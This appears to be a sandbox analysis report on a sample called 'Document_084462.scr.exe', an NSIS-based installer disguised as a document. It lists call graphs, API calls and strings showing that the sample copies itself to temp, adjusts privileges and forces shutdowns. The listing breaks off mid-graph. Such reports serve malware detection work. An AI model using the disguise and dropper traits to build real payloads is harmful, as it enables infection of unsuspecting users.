4352->4351 4353 405cc3 3 API calls 4352->4353 4354 40348f 4353->4354 4355 4059a2 2 API calls 4354->4355 4356 403495 4355->4356 4465 405f13 4356->4465 4469 405ee4 GetFileAttributesW CreateFileW 4359->4469 4361 403055 4386 403065 4361->4386 4470 4063ee lstrcpynW 4361->4470 4363 40307b 4364 405d0f 2 API calls 4363->4364 4365 403081 4364->4365 4471 4063ee lstrcpynW 4365->4471 4367 40308c GetFileSize 4368 403186 4367->4368 4380 4030a3 4367->4380 4472 402fb1 4368->4472 4370 40318f 4372 4031bf GlobalAlloc 4370->4372 4370->4386 4507 40345a SetFilePointer 4370->4507 4483 40345a SetFilePointer 4372->4483 4374 4031f2 4376 402fb1 6 API calls 4374->4376 4376->4386 4377 4031a8 4379 403444 ReadFile 4377->4379 4378 4031da 4484 40324c 4378->4484 4382 4031b3 4379->4382 4380->4368 4380->4374 4383 402fb1 6 API calls 4380->4383 4380->4386 4504 403444 4380->4504 4382->4372 4382->4386 4383->4380 4384 4031e6 4384->4384 4385 403223 SetFilePointer 4384->4385 4384->4386 4385->4386 4386->4287 4388 4067e3 5 API calls 4387->4388 4389 403ad1 4388->4389 4390 403ad7 GetUserDefaultUILanguage 4389->4390 4391 403ae9 4389->4391 4513 406335 wsprintfW 4390->4513 4393 4062bc 3 API calls 4391->4393 4395 403b19 4393->4395 4394 403ae7 4514 403d93 4394->4514 4396 403b38 lstrcatW 4395->4396 4397 4062bc 3 API calls 4395->4397 4396->4394 4397->4396 4400 405dcb 18 API calls 4401 403b6a 4400->4401 4402 403bfe 4401->4402 4404 4062bc 3 API calls 4401->4404 4403 405dcb 18 API calls 4402->4403 4405 403c04 4403->4405 4406 403b9c 4404->4406 4407 403c14 LoadImageW 4405->4407 4408 40642b 17 API calls 4405->4408 4406->4402 4411 403bbd lstrlenW 4406->4411 4414 405cf0 CharNextW 4406->4414 4409 403cba 4407->4409 4410 403c3b RegisterClassW 4407->4410 4408->4407 4413 40140b 2 API calls 4409->4413 4412 403c71 SystemParametersInfoW CreateWindowExW 4410->4412 4442 403cc4 4410->4442 4415 403bf1 4411->4415 4416 403bcb lstrcmpiW 4411->4416 4412->4409 4417 403cc0 4413->4417 4419 403bba 4414->4419 4418 405cc3 3 API calls 4415->4418 4416->4415 4420 403bdb GetFileAttributesW 4416->4420 4421 403d93 18 API calls 4417->4421 4417->4442 4422 403bf7 4418->4422 4419->4411 4423 403be7 4420->4423 4424 403cd1 4421->4424 4529 4063ee lstrcpynW 4422->4529 4423->4415 4426 405d0f 2 API calls 4423->4426 4427 403d60 4424->4427 4428 403cdd ShowWindow 4424->4428 4426->4415 4522 405529 OleInitialize 4427->4522 4429 406773 3 API calls 4428->4429 4432 403cf5 4429->4432 4431 403d66 4433 403d82 4431->4433 4434 403d6a 4431->4434 4435 403d03 GetClassInfoW 4432->4435 4437 406773 3 API calls 4432->4437 4436 40140b 2 API calls 4433->4436 4440 40140b 2 API calls 4434->4440 4434->4442 4438 403d17 GetClassInfoW RegisterClassW 4435->4438 4439 403d2d DialogBoxParamW 4435->4439 4436->4442 4437->4435 4438->4439 4441 40140b 2 API calls 4439->4441 4440->4442 4441->4442 4442->4342 4443->4291 4444->4321 4445->4329 4447 4039fb 4446->4447 4448 4039ed CloseHandle 4446->4448 4541 403a28 4447->4541 4448->4447 4451 405b00 67 API calls 4452 403816 OleUninitialize 4451->4452 4452->4298 4452->4299 4454 405a69 4453->4454 4455 403835 ExitProcess 4454->4455 4456 405a7d MessageBoxIndirectW 4454->4456 4456->4455 4457->4332 4458->4344 4460 405a16 4459->4460 4461 405a0a CloseHandle 4459->4461 4460->4344 4461->4460 4463 401389 2 API calls 4462->4463 4464 401420 4463->4464 4464->4301 4466 405f20 GetTickCount GetTempFileNameW 4465->4466 4467 4034a0 4466->4467 4468 405f56 4466->4468 4467->4279 4468->4466 4468->4467 4469->4361 4470->4363 4471->4367 4473 402fd2 4472->4473 4474 402fba 4472->4474 4477 402fe2 GetTickCount 4473->4477 4478 402fda 4473->4478 4475 402fc3 DestroyWindow 4474->4475 4476 402fca 4474->4476 4475->4476 4476->4370 4480 402ff0 CreateDialogParamW ShowWindow 4477->4480 4481 403013 4477->4481 4508 40681f 4478->4508 4480->4481 4481->4370 4483->4378 4486 403265 4484->4486 4485 403293 4488 403444 ReadFile 4485->4488 4486->4485 4512 40345a SetFilePointer 4486->4512 4489 40329e 4488->4489 4490 4032b0 GetTickCount 4489->4490 4491 4033dd 4489->4491 4499 4033c7 4489->4499 4490->4499 4503 4032dc 4490->4503 4492 40341f 4491->4492 4497 4033e1 4491->4497 4493 403444 ReadFile 4492->4493 4493->4499 4494 403444 ReadFile 4494->4503 4495 403444 ReadFile 4495->4497 4496 405f96 WriteFile 4496->4497 4497->4495 4497->4496 4497->4499 4498 403332 GetTickCount 4498->4503 4499->4384 4500 403357 MulDiv wsprintfW 4501 405456 24 API calls 4500->4501 4501->4503 4502 405f96 WriteFile 4502->4503 4503->4494 4503->4498 4503->4499 4503->4500 4503->4502 4505 405f67 ReadFile 4504->4505 4506 403457 4505->4506 4506->4380 4507->4377 4509 40683c PeekMessageW 4508->4509 4510 406832 DispatchMessageW 4509->4510 4511 402fe0 4509->4511 4510->4509 4511->4370 4512->4485 4513->4394 4515 403da7 4514->4515 4530 406335 wsprintfW 4515->4530 4517 403e18 4531 403e4c 4517->4531 4519 403b48 4519->4400 4520 403e1d 4520->4519 4521 40642b 17 API calls 4520->4521 4521->4520 4534 404390 4522->4534 4524 40554c 4528 405573 4524->4528 4537 401389 4524->4537 4525 404390 SendMessageW 4526 405585 OleUninitialize 4525->4526 4526->4431 4528->4525 4529->4402 4530->4517 4532 40642b 17 API calls 4531->4532 4533 403e5a SetWindowTextW 4532->4533 4533->4520 4535 4043a8 4534->4535 4536 404399 SendMessageW 4534->4536 4535->4524 4536->4535 4539 401390 4537->4539 4538 4013fe 4538->4524 4539->4538 4540 4013cb MulDiv SendMessageW 4539->4540 4540->4539 4542 403a36 4541->4542 4543 403a00 4542->4543 4544 403a3b FreeLibrary GlobalFree 4542->4544 4543->4451 4544->4543 4544->4544 4545 402522 4556 402d7e 4545->4556 4548 402d3e 17 API calls 4549 402535 4548->4549 4550 402540 RegQueryValueExW 4549->4550 4555 402925 4549->4555 4551 402560 4550->4551 4552 402566 RegCloseKey 4550->4552 4551->4552 4561 406335 wsprintfW 4551->4561 4552->4555 4557 402d3e 17 API calls 4556->4557 4558 402d95 4557->4558 4559 40625b RegOpenKeyExW 4558->4559 4560 40252c 4559->4560 4560->4548 4561->4552 5563 4021a2 5564 402d3e 17 API calls 5563->5564 5565 4021a9 5564->5565 5566 402d3e 17 API calls 5565->5566 5567 4021b3 5566->5567 5568 402d3e 17 API calls 5567->5568 5569 4021bd 5568->5569 5570 402d3e 17 API calls 5569->5570 5571 4021c7 5570->5571 5572 402d3e 17 API calls 5571->5572 5574 4021d1 5572->5574 5573 402210 CoCreateInstance 5578 40222f 5573->5578 5574->5573 5575 402d3e 17 API calls 5574->5575 5575->5573 5576 401423 24 API calls 5577 4022ee 5576->5577 5578->5576 5578->5577 5579 4015a3 5580 402d3e 17 API calls 5579->5580 5581 4015aa SetFileAttributesW 5580->5581 5582 4015bc 5581->5582 5583 401fa4 5584 402d3e 17 API calls 5583->5584 5585 401faa 5584->5585 5586 405456 24 API calls 5585->5586 5587 401fb4 5586->5587 5588 4059d7 2 API calls 5587->5588 5589 401fba 5588->5589 5591 40688e 5 API calls 5589->5591 5592 402925 5589->5592 5594 401fdd CloseHandle 5589->5594 5593 401fcf 5591->5593 5593->5594 5596 406335 wsprintfW 5593->5596 5594->5592 5596->5594 5597 700b166d 5598 700b1516 GlobalFree 5597->5598 5600 700b1685 5598->5600 5599 700b16cb GlobalFree 5600->5599 5601 700b16a0 5600->5601 5602 700b16b7 VirtualFree 5600->5602 5601->5599 5602->5599 5603 40202a 5604 402d3e 17 API calls 5603->5604 5605 402031 5604->5605 5606 4067e3 5 API calls 5605->5606 5607 402040 5606->5607 5608 40205c GlobalAlloc 5607->5608 5617 4020c4 5607->5617 5609 402070 5608->5609 5608->5617 5610 4067e3 5 API calls 5609->5610 5611 402077 5610->5611 5612 4067e3 5 API calls 5611->5612 5613 402081 5612->5613 5613->5617 5618 406335 wsprintfW 5613->5618 5615 4020b6 5619 406335 wsprintfW 5615->5619 5618->5615 5619->5617 5620 700b10e1 5623 700b1111 5620->5623 5621 700b11d8 GlobalFree 5622 700b12ba 2 API calls 5622->5623 5623->5621 5623->5622 5624 700b11d3 5623->5624 5625 700b11f8 GlobalFree 5623->5625 5626 700b1272 2 API calls 5623->5626 5627 700b1164 GlobalAlloc 5623->5627 5628 700b12e1 lstrcpyW 5623->5628 5629 700b11c4 GlobalFree 5623->5629 5624->5621 5625->5623 5626->5629 5627->5623 5628->5623 5629->5623 5630 4023aa 5631 4023b2 5630->5631 5632 4023b8 5630->5632 5633 402d3e 17 API calls 5631->5633 5634 402d3e 17 API calls 5632->5634 5636 4023c6 5632->5636 5633->5632 5634->5636 5635 402d3e 17 API calls 5638 4023dd WritePrivateProfileStringW 5635->5638 5637 402d3e 17 API calls 5636->5637 5639 4023d4 5636->5639 5637->5639 5639->5635 5640 402f2b 5641 402f56 5640->5641 5642 402f3d SetTimer 5640->5642 5643 402fab 5641->5643 5644 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5641->5644 5642->5641 5644->5643 4656 40242c 4657 402434 4656->4657 4658 40245f 4656->4658 4659 402d7e 17 API calls 4657->4659 4660 402d3e 17 API calls 4658->4660 4661 40243b 4659->4661 4662 402466 4660->4662 4663 402445 4661->4663 4667 402473 4661->4667 4668 402dfc 4662->4668 4665 402d3e 17 API calls 4663->4665 4666 40244c RegDeleteValueW RegCloseKey 4665->4666 4666->4667 4669 402e10 4668->4669 4670 402e09 4668->4670 4669->4670 4672 402e41 4669->4672 4670->4667 4673 40625b RegOpenKeyExW 4672->4673 4674 402e6f 4673->4674 4675 402f24 4674->4675 4676 402e79 4674->4676 4675->4670 4677 402e7f RegEnumValueW 4676->4677 4681 402ea2 4676->4681 4678 402f09 RegCloseKey 4677->4678 4677->4681 4678->4675 4679 402ede RegEnumKeyW 4680 402ee7 RegCloseKey 4679->4680 4679->4681 4682 4067e3 5 API calls 4680->4682 4681->4678 4681->4679 4681->4680 4683 402e41 6 API calls 4681->4683 4684 402ef7 4682->4684 4683->4681 4685 402f19 4684->4685 4686 402efb RegDeleteKeyW 4684->4686 4685->4675 4686->4675 5645 401a30 5646 402d3e 17 API calls 5645->5646 5647 401a39 ExpandEnvironmentStringsW 5646->5647 5648 401a4d 5647->5648 5650 401a60 5647->5650 5649 401a52 lstrcmpW 5648->5649 5648->5650 5649->5650 5651 404db1 GetDlgItem GetDlgItem 5652 404e05 7 API calls 5651->5652 5659 40502f 5651->5659 5653 404ea2 SendMessageW 5652->5653 5654 404eaf DeleteObject 5652->5654 5653->5654 5655 404eba 5654->5655 5656 404ef1 5655->5656 5658 40642b 17 API calls 5655->5658 5661 404344 18 API calls 5656->5661 5657 405117 5662 4051c0 5657->5662 5671 40516d SendMessageW 5657->5671 5694 405022 5657->5694 5663 404ed3 SendMessageW SendMessageW 5658->5663 5659->5657 5660 4050a1 5659->5660 5669 404cff 5 API calls 5659->5669 5660->5657 5667 405109 SendMessageW 5660->5667 5666 404f05 5661->5666 5664 4051d5 5662->5664 5665 4051c9 SendMessageW 5662->5665 5663->5655 5673 4051e7 ImageList_Destroy 5664->5673 5674 4051ee 5664->5674 5690 4051fe 5664->5690 5665->5664 5670 404344 18 API calls 5666->5670 5667->5657 5668 4043ab 8 API calls 5672 4053c3 5668->5672 5669->5660 5684 404f16 5670->5684 5676 405182 SendMessageW 5671->5676 5671->5694 5673->5674 5677 4051f7 GlobalFree 5674->5677 5674->5690 5675 405377 5680 405389 ShowWindow GetDlgItem ShowWindow 5675->5680 5675->5694 5679 405195 5676->5679 5677->5690 5678 404ff1 GetWindowLongW SetWindowLongW 5681 40500a 5678->5681 5685 4051a6 SendMessageW 5679->5685 5680->5694 5682 405027 5681->5682 5683 40500f ShowWindow 5681->5683 5704 404379 SendMessageW 5682->5704 5703 404379 SendMessageW 5683->5703 5684->5678 5686 404fec 5684->5686 5689 404f69 SendMessageW 5684->5689 5691 404fa7 SendMessageW 5684->5691 5692 404fbb SendMessageW 5684->5692 5685->5662 5686->5678 5686->5681 5689->5684 5690->5675 5693 404d7f 4 API calls 5690->5693 5696 405239 5690->5696 5691->5684 5692->5684 5693->5696 5694->5668 5695 405343 5697 40534d InvalidateRect 5695->5697 5700 405359 5695->5700 5698 405267 SendMessageW 5696->5698 5699 40527d 5696->5699 5697->5700 5698->5699 5699->5695 5701 4052f1 SendMessageW SendMessageW 5699->5701 5700->5675 5705 404cba 5700->5705 5701->5699 5703->5694 5704->5659 5708 404bf1 5705->5708 5707 404ccf 5707->5675 5709 404c0a 5708->5709 5710 40642b 17 API calls 5709->5710 5711 404c6e 5710->5711 5712 40642b 17 API calls 5711->5712 5713 404c79 5712->5713 5714 40642b 17 API calls 5713->5714 5715 404c8f lstrlenW wsprintfW SetDlgItemTextW 5714->5715 5715->5707 5721 4044b4 lstrlenW 5722 4044d3 5721->5722 5723 4044d5 WideCharToMultiByte 5721->5723 5722->5723 5724 404835 5725 404861 5724->5725 5726 404872 5724->5726 5785 405a38 GetDlgItemTextW 5725->5785 5728 40487e GetDlgItem 5726->5728 5733 4048dd 5726->5733 5731 404892 5728->5731 5729 4049c1 5734 404b70 5729->5734 5787 405a38 GetDlgItemTextW 5729->5787 5730 40486c 5732 40669d 5 API calls 5730->5732 5736 4048a6 SetWindowTextW 5731->5736 5737 405d6e 4 API calls 5731->5737 5732->5726 5733->5729 5733->5734 5738 40642b 17 API calls 5733->5738 5741 4043ab 8 API calls 5734->5741 5740 404344 18 API calls 5736->5740 5742 40489c 5737->5742 5743 404951 SHBrowseForFolderW 5738->5743 5739 4049f1 5744 405dcb 18 API calls 5739->5744 5745 4048c2 5740->5745 5746 404b84 5741->5746 5742->5736 5750 405cc3 3 API calls 5742->5750 5743->5729 5747 404969 CoTaskMemFree 5743->5747 5748 4049f7 5744->5748 5749 404344 18 API calls 5745->5749 5751 405cc3 3 API calls 5747->5751 5788 4063ee lstrcpynW 5748->5788 5752 4048d0 5749->5752 5750->5736 5753 404976 5751->5753 5786 404379 SendMessageW 5752->5786 5756 4049ad SetDlgItemTextW 5753->5756 5761 40642b 17 API calls 5753->5761 5756->5729 5757 4048d6 5759 4067e3 5 API calls 5757->5759 5758 404a0e 5760 4067e3 5 API calls 5758->5760 5759->5733 5767 404a15 5760->5767 5762 404995 lstrcmpiW 5761->5762 5762->5756 5765 4049a6 lstrcatW 5762->5765 5763 404a56 5789 4063ee lstrcpynW 5763->5789 5765->5756 5766 404a5d 5768 405d6e 4 API calls 5766->5768 5767->5763 5771 405d0f 2 API calls 5767->5771 5773 404aae 5767->5773 5769 404a63 GetDiskFreeSpaceW 5768->5769 5772 404a87 MulDiv 5769->5772 5769->5773 5771->5767 5772->5773 5774 404b1f 5773->5774 5776 404cba 20 API calls 5773->5776 5775 404b42 5774->5775 5777 40140b 2 API calls 5774->5777 5790 404366 KiUserCallbackDispatcher 5775->5790 5778 404b0c 5776->5778 5777->5775 5780 404b21 SetDlgItemTextW 5778->5780 5781 404b11 5778->5781 5780->5774 5783 404bf1 20 API calls 5781->5783 5782 404b5e 5782->5734 5784 40478e SendMessageW 5782->5784 5783->5774 5784->5734 5785->5730 5786->5757 5787->5739 5788->5758 5789->5766 5790->5782 5791 401735 5792 402d3e 17 API calls 5791->5792 5793 40173c SearchPathW 5792->5793 5794 401757 5793->5794 5795 402636 5796 402665 5795->5796 5797 40264a 5795->5797 5799 402695 5796->5799 5800 40266a 5796->5800 5798 402d1c 17 API calls 5797->5798 5809 402651 5798->5809 5802 402d3e 17 API calls 5799->5802 5801 402d3e 17 API calls 5800->5801 5803 402671 5801->5803 5804 40269c lstrlenW 5802->5804 5812 406410 WideCharToMultiByte 5803->5812 5804->5809 5806 402685 lstrlenA 5806->5809 5807 4026c9 5808 4026df 5807->5808 5810 405f96 WriteFile 5807->5810 5809->5807 5809->5808 5811 405fc5 5 API calls 5809->5811 5810->5808 5811->5807 5812->5806 5813 4014b8 5814 4014be 5813->5814 5815 401389 2 API calls 5814->5815 5816 4014c6 5815->5816 5817 401d38 5818 402d1c 17 API calls 5817->5818 5819 401d3f 5818->5819 5820 402d1c 17 API calls 5819->5820 5821 401d4b GetDlgItem 5820->5821 5822 402630 5821->5822 5823 4028bb 5824 4028c1 5823->5824 5825 402bc2 5824->5825 5826 4028c9 FindClose 5824->5826 5826->5825

                                                                              Executed Functions

                                                                              Function 004034A2 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410stringfilecomCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 4034a2-4034df SetErrorMode GetVersion 1 4034e1-4034e9 call 4067e3 0->1 2 4034f2 0->2 1->2 7 4034eb 1->7 4 4034f7-40350b call 406773 lstrlenA 2->4 9 40350d-403529 call 4067e3 * 3 4->9 7->2 16 40353a-403599 #17 OleInitialize SHGetFileInfoW call 4063ee GetCommandLineW call 4063ee 9->16 17 40352b-403531 9->17 24 4035a3-4035bd call 405cf0 CharNextW 16->24 25 40359b-4035a2 16->25 17->16 21 403533 17->21 21->16 28 4035c3-4035c9 24->28 29 4036d4-4036ee GetTempPathW call 403471 24->29 25->24 30 4035d2-4035d6 28->30 31 4035cb-4035d0 28->31 38 4036f0-40370e GetWindowsDirectoryW lstrcatW call 403471 29->38 39 403746-403760 DeleteFileW call 403015 29->39 33 4035d8-4035dc 30->33 34 4035dd-4035e1 30->34 31->30 31->31 33->34 36 4036a0-4036ad call 405cf0 34->36 37 4035e7-4035ed 34->37 54 4036b1-4036b7 36->54 55 4036af-4036b0 36->55 42 403608-403641 37->42 43 4035ef-4035f7 37->43 38->39 52 403710-403740 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403471 38->52 56 403811-403821 call 4039e3 OleUninitialize 39->56 57 403766-40376c 39->57 50 403643-403648 42->50 51 40365e-403698 42->51 48 4035f9-4035fc 43->48 49 4035fe 43->49 48->42 48->49 49->42 50->51 58 40364a-403652 50->58 51->36 53 40369a-40369e 51->53 52->39 52->56 53->36 60 4036bf-4036cd call 4063ee 53->60 54->28 61 4036bd 54->61 55->54 75 403947-40394d 56->75 76 403827-403837 call 405a54 ExitProcess 56->76 62 403801-403808 call 403abd 57->62 63 403772-40377d call 405cf0 57->63 65 403654-403657 58->65 66 403659 58->66 68 4036d2 60->68 61->68 74 40380d 62->74 80 4037cb-4037d5 63->80 81 40377f-4037b4 63->81 65->51 65->66 66->51 68->29 74->56 78 4039cb-4039d3 75->78 79 40394f-403965 GetCurrentProcess OpenProcessToken 75->79 82 4039d5 78->82 83 4039d9-4039dd ExitProcess 78->83 87 403967-403995 LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 40399b-4039a9 call 4067e3 79->88 85 4037d7-4037e5 call 405dcb 80->85 86 40383d-403851 call 4059bf lstrcatW 80->86 89 4037b6-4037ba 81->89 82->83 85->56 99 4037e7-4037fd call 4063ee * 2 85->99 100 403853-403859 lstrcatW 86->100 101 40385e-403878 lstrcatW lstrcmpiW 86->101 87->88 102 4039b7-4039c2 ExitWindowsEx 88->102 103 4039ab-4039b5 88->103 93 4037c3-4037c7 89->93 94 4037bc-4037c1 89->94 93->89 98 4037c9 93->98 94->93 94->98 98->80 99->62 100->101 101->56 105 40387a-40387d 101->105 102->78 106 4039c4-4039c6 call 40140b 102->106 103->102 103->106 108 403886 call 4059a2 105->108 109 40387f-403884 call 405925 105->109 106->78 117 40388b-403899 SetCurrentDirectoryW 108->117 109->117 118 4038a6-4038cf call 4063ee 117->118 119 40389b-4038a1 call 4063ee 117->119 123 4038d4-4038f0 call 40642b DeleteFileW 118->123 119->118 126 403931-403939 123->126 127 4038f2-403902 CopyFileW 123->127 126->123 128 40393b-403942 call 4061b4 126->128 127->126 129 403904-403924 call 4061b4 call 40642b call 4059d7 127->129 128->56 129->126 138 403926-40392d CloseHandle 129->138 138->126
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE ref: 004034C5
                                                                              • GetVersion.KERNEL32 ref: 004034CB
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                                                              • OleInitialize.OLE32(00000000), ref: 00403542
                                                                              • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                                                              • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Document_084462.scr.exe",00000020,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                                                                • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
                                                                              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
                                                                              • ExitProcess.KERNEL32 ref: 00403837
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                                                              • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Document_084462.scr.exe,0079F708,?,?,00000007,00000009,0000000B), ref: 004038FA
                                                                              • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                                                              • ExitProcess.KERNEL32 ref: 004039DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\Desktop$C:\Users\user\Desktop\Document_084462.scr.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                                                              • API String ID: 3441113951-2188450108
                                                                              • Opcode ID: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                                                              • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                                                              • Opcode Fuzzy Hash: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                                                              • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E
                                                                              Function 00405595 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 139 405595-4055b0 140 4055b6-40567d GetDlgItem * 3 call 404379 call 404cd2 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40573f-405746 139->141 161 40569b-40569e 140->161 162 40567f-405699 SendMessageW * 2 140->162 143 405770-40577d 141->143 144 405748-40576a GetDlgItem CreateThread CloseHandle 141->144 146 40579b-4057a5 143->146 147 40577f-405785 143->147 144->143 151 4057a7-4057ad 146->151 152 4057fb-4057ff 146->152 149 4057c0-4057c9 call 4043ab 147->149 150 405787-405796 ShowWindow * 2 call 404379 147->150 165 4057ce-4057d2 149->165 150->146 156 4057d5-4057e5 ShowWindow 151->156 157 4057af-4057bb call 40431d 151->157 152->149 154 405801-405807 152->154 154->149 163 405809-40581c SendMessageW 154->163 159 4057f5-4057f6 call 40431d 156->159 160 4057e7-4057f0 call 405456 156->160 157->149 159->152 160->159 168 4056a0-4056ac SendMessageW 161->168 169 4056ae-4056c5 call 404344 161->169 162->161 170 405822-40584d CreatePopupMenu call 40642b AppendMenuW 163->170 171 40591e-405920 163->171 168->169 178 4056c7-4056db ShowWindow 169->178 179 4056fb-40571c GetDlgItem SendMessageW 169->179 176 